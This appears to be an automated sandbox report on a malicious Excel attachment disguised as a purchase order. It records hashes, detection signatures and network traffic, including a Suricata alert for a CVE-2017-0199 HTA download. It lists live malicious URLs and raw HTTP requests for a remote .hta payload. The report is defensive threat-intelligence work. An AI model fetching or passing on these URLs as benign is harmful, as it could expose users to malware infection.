Windows Analysis Report
PO554830092024.xls

Overview

General Information

Sample name: PO554830092024.xls
Analysis ID: 1522510
MD5: 1edb633bd6cace0251cdce53c9ebb66a
SHA1: 086134a30e3fcf793078432a88bd07a3e2c4782d
SHA256: 46463f97518091c911a730c5d2d04d1dcfc8d5ed972760983af6a33375567aba
Tags: xlsuser-abuse_ch
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: PO554830092024.xls Virustotal: Detection: 23% Perma Link
Source: PO554830092024.xls ReversingLabs: Detection: 34%
Machine Learning detection for sample
Source: PO554830092024.xls Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49161 version: TLS 1.2
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: og1.in
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 72.5.43.53:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 72.5.43.53:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 72.5.43.53:80
Source: global traffic TCP traffic: 72.5.43.53:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 72.5.43.53:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 72.5.43.53:80
Source: global traffic TCP traffic: 72.5.43.53:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 72.5.43.53:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 72.5.43.53:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 72.5.43.53:80
Source: global traffic TCP traffic: 72.5.43.53:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 72.5.43.53:80
Source: global traffic TCP traffic: 72.5.43.53:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 72.5.43.53:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 72.5.43.53:80
Source: global traffic TCP traffic: 72.5.43.53:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 72.5.43.53:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 72.5.43.53:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 72.5.43.53:80
Source: global traffic TCP traffic: 72.5.43.53:80 -> 192.168.2.22:49164

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 72.5.43.53:80
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 72.5.43.53:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNASSIGNED UNASSIGNED
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ojmkcb HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ojmkcb HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/ne/IEnetworkprojectupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 72.5.43.53Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/ne/IEnetworkprojectupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 72.5.43.53Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknown TCP traffic detected without corresponding DNS query: 72.5.43.53
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B20EFA4.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /ojmkcb HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ojmkcb HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/ne/IEnetworkprojectupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 72.5.43.53Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /450/ne/IEnetworkprojectupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 72.5.43.53Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: og1.in
Source: PO554830092024.xls, 6B630000.0.dr String found in binary or memory: https://og1.in/ojmkcb
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary
barindex
Excel sheet contains many unusual embedded objects
Source: PO554830092024.xls OLE: Microsoft Excel 2007+
Source: 6B630000.0.dr OLE: Microsoft Excel 2007+
Document contains embedded VBA macros
Source: PO554830092024.xls OLE indicator, VBA macros: true
Source: classification engine Classification label: mal64.winXLS@1/8@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\6B630000 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR820A.tmp Jump to behavior
Source: PO554830092024.xls OLE indicator, Workbook stream: true
Source: 6B630000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: PO554830092024.xls Virustotal: Detection: 23%
Source: PO554830092024.xls ReversingLabs: Detection: 34%
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 6B630000.0.dr Initial sample: OLE indicators vbamacros = False
Source: PO554830092024.xls Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: PO554830092024.xls Stream path 'Workbook' entropy: 7.99951239633 (max. 8.0)
Source: 6B630000.0.dr Stream path 'Workbook' entropy: 7.99939820191 (max. 8.0)
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1522510 Sample: PO554830092024.xls Startdate: 30/09/2024 Architecture: WINDOWS Score: 64 15 Suricata IDS alerts for network traffic 2->15 17 Multi AV Scanner detection for submitted file 2->17 19 Excel sheet contains many unusual embedded objects 2->19 21 Machine Learning detection for sample 2->21 5 EXCEL.EXE 57 26 2->5         started        process3 dnsIp4 11 72.5.43.53, 49162, 49164, 80 UNASSIGNED United States 5->11 13 og1.in 172.67.216.244, 443, 49161, 49163 CLOUDFLARENETUS United States 5->13 9 C:\Users\user\...\PO554830092024.xls (copy), Composite 5->9 dropped file5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
72.5.43.53
 unknown United States
16769 UNASSIGNED true
172.67.216.244
 og1.in United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
og1.in 172.67.216.244 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://og1.in/ojmkcb false unknown
http://72.5.43.53/450/ne/IEnetworkprojectupdate.hta true unknown